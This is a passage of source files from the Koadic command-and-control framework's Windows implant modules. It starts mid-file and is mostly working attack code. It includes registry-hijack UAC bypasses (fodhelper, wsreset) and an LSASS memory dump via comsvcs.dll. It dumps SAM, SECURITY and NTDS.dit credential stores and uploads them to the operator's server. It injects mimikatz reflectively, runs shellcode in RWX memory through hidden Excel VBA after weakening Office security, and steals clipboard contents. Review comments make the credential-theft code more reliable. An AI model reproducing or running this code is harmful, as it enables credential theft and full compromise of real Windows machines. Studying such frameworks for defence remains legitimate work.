// short and verify the cleanup actually succeeded.
try
{
    // not sure if this is needed, but it can't hurt, right?
    var consentpath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System";
    var consentval = Koadic.registry.read(Koadic.registry.HKLM, consentpath, "ConsentPromptBehaviorAdmin", Koadic.registry.DWORD).uValue;
    if (consentval == 2)
    {
        var e = Error('Consent value is too high!');
        throw e;
    }

    var path = 'Software\\Classes\\exefile\\shell\\open\\command';
    Koadic.registry.write(Koadic.registry.HKCU, path, 'DelegateExecute', '', Koadic.registry.STRING);
    Koadic.registry.write(Koadic.registry.HKCU, path, '', '~PAYLOAD_DATA~', Koadic.registry.STRING);

    Koadic.shell.run("fodhelper.exe", true);

    Koadic.work.report("Completed");

    // busy-wait ~10 s before removing the hijack (same pattern as the siblings)
    var now = new Date().getTime();
    while (new Date().getTime() < now + 10000);

    if (Koadic.registry.destroy(Koadic.registry.HKCU, path, "") != 0)
    {
        Koadic.shell.run("reg delete HKCU\\"+path+" /f", true);
    }
}
catch (e)
{
    Koadic.work.error(e);
}

Koadic.exit();
--------------------------------------------------------------------------------
/data/implant/elevate/bypassuac_systempropertiesadvanced.js:
--------------------------------------------------------------------------------
try
{
    var myObject = new ActiveXObject("Scripting.FileSystemObject");
    var myPath = "C:\\Users\\"+ '~USER~' + 
"\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll"; 5 | var dll = '~DLL~'; 6 | myObject.CopyFile (dll, myPath); 7 | myObject.DeleteFile(dll); 8 | Koadic.shell.run("C:\\Windows\\syswow64\\systempropertiesadvanced.exe", true); 9 | var now = new Date().getTime(); 10 | while (new Date().getTime() < now + 10000); 11 | myObject.DeleteFile(myPath); 12 | } 13 | catch (e) 14 | { 15 | Koadic.work.error(e); 16 | } 17 | 18 | Koadic.exit(); 19 | -------------------------------------------------------------------------------- /data/implant/elevate/bypassuac_wsreset.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var consentpath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"; 4 | var consentval = Koadic.registry.read(Koadic.registry.HKLM, consentpath, "ConsentPromptBehaviorAdmin", Koadic.registry.DWORD).uValue; 5 | if (consentval == 2) 6 | { 7 | var e = Error('Consent value is too high!'); 8 | throw e; 9 | } 10 | 11 | var path = "Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"; 12 | var delegate = Koadic.registry.read(Koadic.registry.HKCU, path, 'DelegateExecute', Koadic.registry.STRING).SValue; 13 | Koadic.registry.write(Koadic.registry.HKCU, path, 'DelegateExecute', '', Koadic.registry.STRING); 14 | Koadic.registry.write(Koadic.registry.HKCU, path, '', '~PAYLOAD_DATA~', Koadic.registry.STRING); 15 | 16 | Koadic.shell.run("C:\\Windows\\System32\\wsreset.exe", false); 17 | 18 | Koadic.work.report("Completed"); 19 | 20 | Koadic.registry.write(Koadic.registry.HKCU, path, 'DelegateExecute', delegate, Koadic.registry.STRING); 21 | Koadic.registry.write(Koadic.registry.HKCU, path, '', '', Koadic.registry.STRING); 22 | } 23 | catch (e) 24 | { 25 | Koadic.work.error(e); 26 | } 27 | 28 | Koadic.exit(); 29 | -------------------------------------------------------------------------------- /data/implant/elevate/system_createservice.js: 
-------------------------------------------------------------------------------- 1 | try 2 | { 3 | Koadic.shell.run("sc create #random# binpath= \"~PAYLOAD_DATA~\"", true); 4 | Koadic.shell.run("sc start #random#", true); 5 | Koadic.shell.run("sc delete #random#", true); 6 | } 7 | catch (e) 8 | { 9 | Koadic.work.error(e); 10 | } 11 | 12 | Koadic.exit(); 13 | -------------------------------------------------------------------------------- /data/implant/fun/thunderstruck.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var ie = new ActiveXObject("InternetExplorer.Application"); 4 | ie.Visible = 0; 5 | ie.Navigate2("~VIDEOURL~"); 6 | 7 | for (var i = 0; i < 50; ++i) 8 | { 9 | Koadic.WS.SendKeys(String.fromCharCode(0xAF)); 10 | } 11 | 12 | Koadic.shell.run("ping 127.0.0.1 -n ~SECONDS~", false); 13 | ie.Quit(); 14 | } 15 | catch (e) 16 | { 17 | Koadic.work.error(e); 18 | } 19 | Koadic.exit(); 20 | -------------------------------------------------------------------------------- /data/implant/fun/thunderstruck.vbs: -------------------------------------------------------------------------------- 1 | Set ie = CreateObject("InternetExplorer.Application") 2 | ie.Visible = 0 3 | ie.Navigate2 "~VIDEOURL~" 4 | 5 | For i = 0 To 50 6 | kows.SendKeys(chr(&hAF)) 7 | Next 8 | 9 | KoSleep 90 10 | 11 | KoExit 12 | -------------------------------------------------------------------------------- /data/implant/fun/voice.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var voiceObj = new ActiveXObject("sapi.spvoice"); 4 | 5 | for (var i = 0; i < 50; ++i) 6 | { 7 | Koadic.WS.SendKeys(String.fromCharCode(0xAF)); 8 | } 9 | voiceObj.Speak("~MESSAGE~"); 10 | Koadic.work.report(""); 11 | } 12 | catch (e) 13 | { 14 | Koadic.work.error(e); 15 | } 16 | Koadic.exit(); 17 | -------------------------------------------------------------------------------- /data/implant/fun/voice.vbs: 
-------------------------------------------------------------------------------- 1 | sub DoVoice 2 | dim speechobject 3 | set speechobject=createobject("sapi.spvoice") 4 | 5 | For i = 0 To 50 6 | kows.SendKeys(chr(&hAF)) 7 | Next 8 | 9 | speechobject.speak "~MESSAGE~" 10 | end sub 11 | 12 | DoVoice 13 | KoReportWork "" 14 | KoExit 15 | -------------------------------------------------------------------------------- /data/implant/gather/clipboard.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var html = new ActiveXObject("htmlfile"); 4 | var text = html.parentWindow.clipboardData.getData("text"); 5 | Koadic.work.report(text); 6 | } 7 | catch (e) 8 | { 9 | Koadic.work.error(e) 10 | } 11 | 12 | Koadic.exit(); 13 | -------------------------------------------------------------------------------- /data/implant/gather/clipboard.vbs: -------------------------------------------------------------------------------- 1 | Set objHTML = CreateObject("htmlfile") 2 | text = objHTML.ParentWindow.ClipboardData.GetData("text") 3 | 4 | KoReportWork text 5 | 6 | KoExit 7 | 8 | 'Set ie = CreateObject("InternetExplorer.Application") 9 | 'ie.Visible = 0 10 | 'ie.Navigate2 "C:\Users\David Candy\Desktop\Filter.html" 11 | 'Do 12 | '' wscript.sleep 100 13 | 'Loop until ie.document.readystate = "complete" 14 | 'txt=ie.document.parentwindow.clipboardData.GetData("TEXT") 15 | 'ie.quit 16 | 'If IsNull(txt) = true then 17 | 'outp.writeline "No text on clipboard" 18 | 'else 19 | 'outp.writeline txt 20 | 'End If 21 | -------------------------------------------------------------------------------- /data/implant/gather/comsvcs_lsass.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var headers = {}; 4 | 5 | var res_file = "~DIRECTORY~\\"+Koadic.uuid()+".bin"; 6 | 7 | var lpid = ""; 8 | 9 | if (~LSASSPID~ == 0) 10 | { 11 | lpid = Koadic.process.getPID("lsass.exe"); 12 | if (lpid) 13 | { 14 | 
Koadic.work.report(lpid.toString(),{'Task': 'pid'}); 15 | } 16 | else 17 | { 18 | Koadic.work.report('',{'Task': 'nopid'}); 19 | var e = Error('Could not identify process ID'); 20 | throw e; 21 | } 22 | } 23 | else 24 | { 25 | lpid = ~LSASSPID~; 26 | } 27 | 28 | var cmd = "C:\\Windows\\System32\\rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump "+ lpid.toString()+ " " + res_file + " full"; 29 | 30 | Koadic.work.report('',{'Task': 'startrun'}); 31 | var newpid = Koadic.WMI.createProcess(cmd, true); 32 | 33 | /* 34 | we only get a process ID returned, so we have to search through running processes 35 | until we can't find the process anymore. then we'll be able to upload. 36 | */ 37 | var pidflag = true; 38 | while (pidflag) 39 | { 40 | pidflag = false; 41 | var processes = Koadic.process.list(); 42 | var items = new Enumerator(processes); 43 | while (!items.atEnd()) 44 | { 45 | var proc = items.item(); 46 | 47 | try 48 | { 49 | if (proc.ProcessId == newpid) 50 | { 51 | pidflag = true; 52 | break; 53 | } 54 | } catch (e) 55 | { 56 | } 57 | items.moveNext(); 58 | } 59 | } 60 | Koadic.work.report('',{'Task': 'endrun'}); 61 | 62 | Koadic.work.report('',{'Task': 'upload'}); 63 | Koadic.http.upload(res_file, 'dump', ~CERTUTIL~, 'Task'); 64 | 65 | Koadic.work.report('',{'Task': 'delbin'}); 66 | Koadic.file.deleteFile(res_file); 67 | 68 | } 69 | catch (e) 70 | { 71 | Koadic.work.error(e); 72 | } 73 | 74 | Koadic.exit(); 75 | -------------------------------------------------------------------------------- /data/implant/gather/enum_printers.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var WshNetwork = WScript.CreateObject("WScript.Network"); 4 | var oPrinters = WshNetwork.EnumPrinterConnections(); 5 | 6 | var ret = ""; 7 | for (i = 0; i < oPrinters.length; i += 2) 8 | { 9 | ret += oPrinters.Item(i) + " = " + oPrinters.Item(i + 1) + "\n"; 10 | } 11 | 12 | Koadic.work.report(ret); 13 | } 14 | catch (e) 15 | { 16 
| Koadic.work.error(e); 17 | } 18 | 19 | Koadic.exit(); -------------------------------------------------------------------------------- /data/implant/gather/enum_shares.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var WshNetwork = WScript.CreateObject("WScript.Network"); 4 | var oDrives = WshNetwork.EnumNetworkDrives(); 5 | 6 | var ret = ""; 7 | for (i = 0; i < oDrives.length; i += 2) 8 | { 9 | ret += oDrives.Item(i) + " = " + oDrives.Item(i + 1) + "\n"; 10 | } 11 | 12 | Koadic.work.report(ret); 13 | } 14 | catch (e) 15 | { 16 | Koadic.work.error(e); 17 | } 18 | 19 | Koadic.exit(); 20 | -------------------------------------------------------------------------------- /data/implant/gather/enum_users.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var computer = "."; 4 | var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\" + computer + "\\root\\cimv2"); 5 | 6 | // https://msdn.microsoft.com/en-us/library/aa394189(v=vs.85).aspx 7 | var sessions = wmi.ExecQuery("Select * from Win32_LogonSession Where LogonType = 2 OR LogonType = 10"); 8 | 9 | if (sessions.Count == 0) 10 | { 11 | Koadic.work.report("No interactive users found.") 12 | } 13 | else 14 | { 15 | for (var e = new Enumerator(sessions); !e.atEnd(); e.moveNext()) 16 | { 17 | var session = e.item(); 18 | 19 | var query = ""; 20 | query += "Associators of {Win32_LogonSession.LogonId=" + session.LogonId; 21 | query += "} Where AssocClass=Win32_LoggedOnUser Role=Dependent"; 22 | var users = wmi.ExecQuery(query); 23 | 24 | for (var f = new Enumerator(users); !f.atEnd(); f.moveNext()) 25 | { 26 | var user = f.item(); 27 | var info = user.Caption; 28 | Koadic.work.report(info); 29 | } 30 | } 31 | } 32 | } catch (e) 33 | { 34 | Koadic.work.error(e); 35 | } 36 | Koadic.work.report("Complete"); 37 | Koadic.exit(); 38 | 
-------------------------------------------------------------------------------- /data/implant/gather/enum_users.js.old: -------------------------------------------------------------------------------- 1 | function stringify_user(user, loggedOn) 2 | { 3 | var ret = ""; 4 | ret += user.Caption + "\n"; 5 | ret += user.Description + "\n"; 6 | ret += user.InstallDate + "\n"; 7 | ret += user.Name + "\n"; 8 | ret += user.Status + "\n"; 9 | ret += user.StartTime + "\n"; 10 | ret += user.AuthenticationPackage + "\n"; 11 | ret += user.LogonId + "\n"; 12 | ret += user.LogonType + "\n"; 13 | 14 | ret += loggedOn.Properties_; 15 | ret += loggedOn.Name; 16 | ret += loggedOn.Antecedent; 17 | ret += loggedOn.Dependent; 18 | 19 | return ret; 20 | } 21 | 22 | try { 23 | var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2"); 24 | var columns = wmi.ExecQuery("Select * From Win32_LoggedOnUser"); 25 | 26 | for (var e = new Enumerator(columns); !e.atEnd(); e.moveNext()) 27 | { 28 | var session = e.item(); 29 | var str = session.Antecedent+ "\n" + session.Dependent; 30 | //var str = stringify_user(session, eAssoc); 31 | alert(str) 32 | //var assocs = wmi.ExecQuery("Associators of {Win32_LogonSession.LogonId=" + session.LogonId + "} Where AssocClass=Win32_LoggedOnUser Role=Dependent"); 33 | 34 | 35 | //for (var eAssoc = new Enumerator(assocs); !eAssoc.atEnd(); eAssoc.moveNext()) 36 | //{ 37 | // var str = stringify_user(session, eAssoc); 38 | // alert(str) 39 | //} 40 | 41 | Koadic.work.report(str); 42 | } 43 | 44 | Koadic.work.report("done"); 45 | } catch (e) { 46 | alert(e) 47 | Koadic.work.error(e); 48 | } 49 | 50 | Koadic.exit(); 51 | -------------------------------------------------------------------------------- /data/implant/gather/hashdump_dc.js: -------------------------------------------------------------------------------- 1 | try { 2 | var ntds_path = Koadic.file.getPath("~RPATH~\\~NTDSFILE~"); 3 | var sysh_path = 
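Koadic.file.getPath("~RPATH~\\~SYSHFILE~");

    // step 1. create and send .dit file, delete

    // todo: detect if shadow copy already available?

    var outp = Koadic.shell.exec("vssadmin create shadow /for=~DRIVE~", "~RPATH~\\~NTDSFILE~1.txt");

    // When vssadmin fails (not elevated, VSS disabled, bad ~DRIVE~) its output
    // carries neither marker and split(...)[1] is undefined; the original then
    // died with a TypeError on .split.  Fail with the tool's own output instead.
    var volParts = outp.split("Shadow Copy Volume Name: ");
    var idParts = outp.split("Shadow Copy ID: ");
    if (volParts.length < 2 || idParts.length < 2)
    {
        throw Error("vssadmin did not create a shadow copy: " + outp);
    }
    // strip trailing CR/whitespace so it cannot end up inside the copy and
    // delete commands built below
    var shadow = volParts[1].split('\n')[0].replace(/\s+$/, "");
    var shadowid = idParts[1].split('\n')[0].replace(/\s+$/, "");

    try
    {
        var unused = Koadic.shell.exec("copy " + shadow + "\\windows\\ntds\\ntds.dit " + ntds_path, "~RPATH~\\~NTDSFILE~2.txt");
        Koadic.http.upload(ntds_path, "~NTDSFILE~", ~CERTUTIL~, "~UUIDHEADER~");
        Koadic.file.deleteFile(ntds_path);

        // step 2. create, send SYSTEM hive, delete
        Koadic.shell.run("reg save HKLM\\SYSTEM " + sysh_path + " /y", false);
        Koadic.http.upload(sysh_path, "~SYSHFILE~", ~CERTUTIL~, "~UUIDHEADER~");
        Koadic.file.deleteFile(sysh_path);
    }
    finally
    {
        // Always drop the snapshot we created, even when a copy/upload above
        // threw; previously any failure left the shadow copy behind on the DC.
        var discard = Koadic.shell.exec("vssadmin delete shadows /shadow="+shadowid+" /quiet", "~RPATH~\\"+Koadic.uuid()+".txt");
    }

    // step 3. 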
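// general complete
    Koadic.work.report("Complete");
} catch (e) {
    Koadic.work.error(e);
}

Koadic.exit();
--------------------------------------------------------------------------------
/data/implant/gather/hashdump_sam.js:
--------------------------------------------------------------------------------
// Dump SAM and SECURITY (plus either the SYSTEM hive or the four LSA syskey
// subkeys) via "reg save", upload each file, and remove the on-disk copies.

// Best-effort delete for the finally blocks below: a second exception from
// deleteFile must not hide the upload error that got us there.
function tryDelete(p)
{
    try
    {
        Koadic.file.deleteFile(p);
    }
    catch (e)
    {
    }
}

// Codepage tag reported to the server; "1252" when Koadic.user.encoder() is
// unavailable or throws.
function currentEncoder()
{
    try
    {
        return Koadic.user.encoder();
    }
    catch (e)
    {
        return "1252";
    }
}

function GetSysKey()
{
    var jdpath = Koadic.file.getPath("~RPATH~\\42JD");
    var skew1path = Koadic.file.getPath("~RPATH~\\42Skew1");
    var gbgpath = Koadic.file.getPath("~RPATH~\\42GBG");
    var datapath = Koadic.file.getPath("~RPATH~\\42Data");

    try
    {
        Koadic.shell.run("reg save HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\JD" + " " + jdpath + " /y", false);
        Koadic.shell.run("reg save HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Skew1" + " " + skew1path + " /y", false);
        Koadic.shell.run("reg save HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\GBG" + " " + gbgpath + " /y", false);
        Koadic.shell.run("reg save HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Data" + " " + datapath + " /y", false);

        var data = Koadic.file.readBinary(jdpath);
        data += "~~~"+Koadic.file.readBinary(skew1path);
        data += "~~~"+Koadic.file.readBinary(gbgpath);
        data += "~~~"+Koadic.file.readBinary(datapath);

        var headers = {};
        headers["Task"] = "SysKey";
        headers["encoder"] = currentEncoder();

        // The original tested `Koadic.user.encoder != "936"`, i.e. compared the
        // function object itself to a string -- always true -- so this escaping
        // ran on every codepage while the header said otherwise.  Test the
        // resolved value that is actually sent.
        // NOTE(review): the server-side SysKey handler must unescape under the
        // same rule (encoder != "936"); confirm before relying on this.
        if (headers["encoder"] != "936")
        {
            data = data.replace(/\\/g, "\\\\");
            data = data.replace(/\0/g, "\\0");
        }

        Koadic.work.report(data, headers);
    }
    finally
    {
        // exported registry keys are credential material; never leave them
        // behind, even when a read/report above threw
        tryDelete(jdpath);
        tryDelete(skew1path);
        tryDelete(gbgpath);
        tryDelete(datapath);
    }
}

function DumpHive(name, uuid)
{
    var path = Koadic.file.getPath("~RPATH~\\" + uuid);

    try
    {
        Koadic.shell.run("reg save HKLM\\" + name + " " + path + " /y", false);

        Koadic.http.upload(path, name, ~CERTUTIL~, "Task");
    }
    finally
    {
        // the saved hive is a plaintext copy of the credential store; delete it
        // whether or not the upload succeeded
        tryDelete(path);
    }
}

try
{
    DumpHive("SAM", "42SAM");
    DumpHive("SECURITY", "42SECURITY");
    if (~GETSYSHIVE~)
    {
        DumpHive("SYSTEM", "42SYSTEM");
    }
    else
    {
        GetSysKey();
    }

    Koadic.work.report("Complete");
}
catch (e)
{
    Koadic.work.error(e);
}

Koadic.exit();
--------------------------------------------------------------------------------
/data/implant/gather/loot_finder.js:
--------------------------------------------------------------------------------
try
{
    var tmpfile = "~DIRECTORY~\\" + Koadic.uuid() + ".txt";
    // NOTE(review): ~LOOTD~ / ~LOOTE~ / ~LOOTF~ are spliced verbatim into a cmd
    // pipeline; a value containing quotes, & or | rewrites the command.  They
    // are operator-supplied, so this is a foot-gun rather than an exposure, but
    // the module options should reject such characters.
    var loot = Koadic.shell.exec("dir ~LOOTD~ /s /b | findstr /I \"~LOOTE~ ~LOOTF~\"", tmpfile);
    Koadic.work.report(loot);
}
catch (e)
{
    Koadic.work.error(e)
}

Koadic.exit();
--------------------------------------------------------------------------------
/data/implant/inject/mimikatz_dynwrapx.js:
--------------------------------------------------------------------------------
// Create a DynamicWrapperX instance through a registration-free activation
// context and register the Win32 imports the loader below needs.
// NOTE(review): MessageBoxW, OpenProcess and WriteProcessMemory are registered
// but never called in this module.
function win32_register_via_dynwrapx(manifestPath)
{
    var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" );

    actCtx.Manifest = manifestPath;

    var win32 = actCtx.CreateObject("DynamicWrapperX");

    win32.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l"); // Register a dll function
    win32.Register("kernel32.dll", "VirtualAlloc", "i=puuu", "r=p");
    win32.Register("kernel32.dll", "OpenProcess", "i=uuu", "r=h");
    win32.Register("kernel32.dll", "GetCurrentProcess", "r=h");
    win32.Register("kernel32.dll", "WriteProcessMemory", "i=hllll", "r=u");
    win32.Register("kernel32.dll", "CreateThread", "i=llplll", "r=h");
    win32.Register("kernel32.dll", "WaitForSingleObject", "i=hu", "r=u");

    return win32;
}

function win32_write_memory(win32, str)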
{ 22 | var commit = 0x00003000; /* MEM_COMMIT | MEM_RESERVE */ 23 | var guard = 0x40; /*PAGE_EXECUTE_READWRITE*/ 24 | 25 | var pMem = win32.VirtualAlloc(0, str.length * 4, commit, guard); 26 | var pProcess = win32.GetCurrentProcess(); 27 | 28 | for (var i = 0; i < str.length; ++i) 29 | { 30 | win32.NumPut(str[i], pMem, i * 4, "u"); 31 | } 32 | 33 | return pMem; 34 | } 35 | 36 | try 37 | { 38 | var manifestPath = Koadic.file.getPath("~DIRECTORY~\\dynwrapx.manifest"); 39 | Koadic.http.download(manifestPath, "~MANIFESTUUID~"); 40 | 41 | Koadic.http.download("~DIRECTORY~\\dynwrapx.dll", "~DLLUUID~"); 42 | 43 | var win32 = win32_register_via_dynwrapx(manifestPath) 44 | var shim_lpParam = "~MIMICMD~~~~UUIDHEADER~~~~SHIMX64UUID~~~~MIMIX86UUID~~~~MIMIX64UUID~~~" + Koadic.work.make_url(); 45 | 46 | var arrDLL = [ 47 | ~SHIMX86BYTES~ 48 | ]; 49 | 50 | var pMem = win32_write_memory(win32, arrDLL); 51 | 52 | var pReflective = pMem + ~SHIMX86OFFSET~; 53 | 54 | var thread = win32.CreateThread(0, 0, pReflective, win32.StrPtr(shim_lpParam), 0, 0); 55 | win32.WaitForSingleObject(thread, 100000); 56 | 57 | //Koadic.work.report("Success"); 58 | } 59 | catch (e) 60 | { 61 | Koadic.work.error(e); 62 | } 63 | 64 | Koadic.file.deleteFile(manifestPath); 65 | Koadic.exit(); 66 | -------------------------------------------------------------------------------- /data/implant/inject/mimikatz_tashlib.js: -------------------------------------------------------------------------------- 1 | try 2 | { 3 | var manifestPath = Koadic.file.getPath("~DIRECTORY~\\TashLib.manifest"); 4 | Koadic.http.download(manifestPath, "~MANIFESTUUID~"); 5 | 6 | Koadic.http.download("~DIRECTORY~\\TashLib.dll", "~DLLUUID~"); 7 | 8 | var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" ); 9 | actCtx.Manifest = manifestPath; 10 | var tash = actCtx.CreateObject("TashLib.TashLoader"); 11 | 12 | var shim_lpParam = "~MIMICMD~~~~UUIDHEADER~~~~SHIMX64UUID~~~~MIMIX86UUID~~~~MIMIX64UUID~~~" + Koadic.work.make_url(); 13 | 14 
| // TSC = "\x..." 15 | ~SHIMX86BYTES~ 16 | 17 | var res = tash.Load(TSC, shim_lpParam, ~SHIMX86OFFSET~); 18 | 19 | Koadic.work.report("Success"); 20 | } 21 | catch (e) 22 | { 23 | Koadic.work.error(e); 24 | } 25 | 26 | Koadic.file.deleteFile(manifestPath); 27 | Koadic.exit(); 28 | -------------------------------------------------------------------------------- /data/implant/inject/reflectdll_excel.js: -------------------------------------------------------------------------------- 1 | try { 2 | var objExcel = new ActiveXObject("Excel.Application"); 3 | objExcel.Visible = false; 4 | var Application_Version = objExcel.Version;//Auto-Detect Version 5 | var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; 6 | 7 | var WshShell = new ActiveXObject("WScript.Shell"); 8 | WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); 9 | var objWorkbook = objExcel.Workbooks.Add(); 10 | var xlmodule = objWorkbook.VBProject.VBComponents.Add(1); 11 | 12 | strCode = '#If Vba7 Then\n' 13 | strCode += 'Private Declare PtrSafe Function WinExec Lib "kernel32" (ByVal cmd As String, ByVal nCmdShow As Long) As LongPtr\n' 14 | strCode += '#Else\n' 15 | strCode += 'Private Declare PtrSafe Function WinExec Lib "kernel32" (ByVal cmd As String, ByVal nCmdShow As Long) As Long\n' 16 | strCode += '#EndIf\n' 17 | strCode += '\n' 18 | strCode += 'Sub ExecShell\n' 19 | strCode += ' Dim i As Long\n' 20 | strCode += ' i = WinExec("cmd.exe", 1)\n' 21 | strCode += 'End Sub\n' 22 | 23 | xlmodule.CodeModule.AddFromString(strCode); 24 | var wut = "ExecShell"; 25 | objExcel.Run(wut); 26 | objExcel.DisplayAlerts = false; 27 | objWorkbook.Close(false); 28 | 29 | Koadic.work.report("Success"); 30 | } catch (e) { 31 | Koadic.work.error(e); 32 | } 33 | 34 | Koadic.exit(); 35 | -------------------------------------------------------------------------------- /data/implant/inject/shellcode.vba: 
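--------------------------------------------------------------------------------
Rem Runs the SHELLCODEDECCSV bytes (comma-separated decimal values) inside the
Rem host Office process: allocate RWX memory, copy the bytes in one at a time,
Rem start a thread on the buffer, then Sleep so the host (and the thread in it)
Rem stays alive. Names are obfuscated; the Vba7 branch uses LongPtr for
Rem pointer-sized values so the same module also works on 64-bit Office.
Rem Comments use Rem and avoid apostrophes and backslashes on purpose: this text
Rem may be embedded in a single-quoted JScript string by the Excel module.
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds as Long)
#EndIf

Sub ExecShell
    Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long
    #If Vba7 Then
    Dim Xlbufvetp As LongPtr
    #Else
    Dim Xlbufvetp As Long
    #EndIf
    Hyeyhafxp = Array(~SHELLCODEDECCSV~)
    Rem Size the buffer by element count. The copy loop writes indices LBound
    Rem through UBound inclusive, i.e. UBound - LBound + 1 bytes; the earlier
    Rem request of UBound bytes was one short and overran the committed region
    Rem whenever the shellcode length was exactly one byte past a page boundary.
    Rem &H1000 = MEM_COMMIT (a NULL base also reserves); &H40 = PAGE_EXECUTE_READWRITE.
    Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp) - LBound(Hyeyhafxp) + 1, &H1000, &H40)
    If Xlbufvetp = 0 Then
        Rem Allocation failed; copying through a NULL base would fault the host.
        Exit Sub
    End If
    For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
        Rem RtlMoveMemory takes the source ByRef As Any, so one byte copied from
        Rem the Long holding this element is its low byte (little-endian).
        Wyzayxya = Hyeyhafxp(Zolde)
        Lezhtplzi = RtlMoveMemory(Xlbufvetp + (Zolde - LBound(Hyeyhafxp)), Wyzayxya, 1)
    Next Zolde
    Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)
    Sleep ~SLEEP~
End Sub
-------------------------------------------------------------------------------- /data/implant/inject/shellcode_dynwrapx.js: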
--------------------------------------------------------------------------------
// Stages the DynamicWrapperX DLL and manifest into DIRECTORY and reports.
// Nothing in this file loads the DLL or runs shellcode; the execution step is
// presumably a follow-up job — TODO confirm against the shellcode_dynwrapx module.
// Paths use forward slashes here, unlike the backslash paths in the mimikatz scripts.
try
{
    Koadic.http.download("~DIRECTORY~/dynwrapx.dll", "~DLLUUID~");
    Koadic.http.download("~DIRECTORY~/dynwrapx.manifest", "~MANIFESTUUID~");

    Koadic.work.report("Success");
}
catch (e)
{
    Koadic.work.error(e);
}

Koadic.exit();
-------------------------------------------------------------------------------- /data/implant/inject/shellcode_excel.js: --------------------------------------------------------------------------------
// Executes server-supplied VBA (the VBACODE expansion, expected to define
// Sub ExecShell — see shellcode.vba) inside a hidden Excel instance.
try {
    var objExcel = new ActiveXObject("Excel.Application");
    objExcel.Visible = false;
    var Application_Version = objExcel.Version;//Auto-Detect Version
    var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";

    // AccessVBOM=1 (HKCU) allows programmatic access to the VBA project, which
    // VBComponents.Add needs. It is never restored, so the weakened setting and
    // the registry write remain as artifacts after the job.
    var WshShell = new ActiveXObject("WScript.Shell");
    WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
    var objWorkbook = objExcel.Workbooks.Add();
    var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);

    // The VBA is substituted into a single-quoted JS literal: the server side
    // must already have escaped newlines, backslashes and single quotes in it.
    strCode = '~VBACODE~'

    xlmodule.CodeModule.AddFromString(strCode);
    var wut = "ExecShell";
    objExcel.Run(wut);
    objExcel.DisplayAlerts = false;
    // Workbook closed unsaved; objExcel.Quit() is absent — presumably because
    // the payload thread created by ExecShell lives in this Excel process and
    // quitting would tear it down (see shellcode.vba).
    objWorkbook.Close(false);

    Koadic.work.report("Success");
} catch (e) {
    Koadic.work.error(e);
}

Koadic.exit();
-------------------------------------------------------------------------------- /data/implant/manage/enable_rdesktop.js: --------------------------------------------------------------------------------
// Sets HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTsConnections
// to the MODE value and reads it back to confirm the write took. Writing HKLM
// needs an elevated implant; only this value is changed (nothing else, e.g.
// the service or the firewall, is touched here).
try
{
    var path = "System\\CurrentControlSet\\Control\\Terminal Server";
    var key = "fDenyTsConnections";

    Koadic.registry.write(Koadic.registry.HKLM, path, key, ~MODE~, Koadic.registry.DWORD);
    var out = Koadic.registry.read(Koadic.registry.HKLM, path, key, Koadic.registry.DWORD);

    // A silent failure (e.g. not elevated) shows up as a read-back mismatch.
    if (out.uValue != ~MODE~)
        throw new Error("Unable to write to registry key.");

    Koadic.work.report("");
}
catch(e)
{
    Koadic.work.error(e);
}

Koadic.exit()
-------------------------------------------------------------------------------- /data/implant/manage/enable_rdesktop.vbs: --------------------------------------------------------------------------------
' VBScript twin of enable_rdesktop.js using the WMI StdRegProv provider.
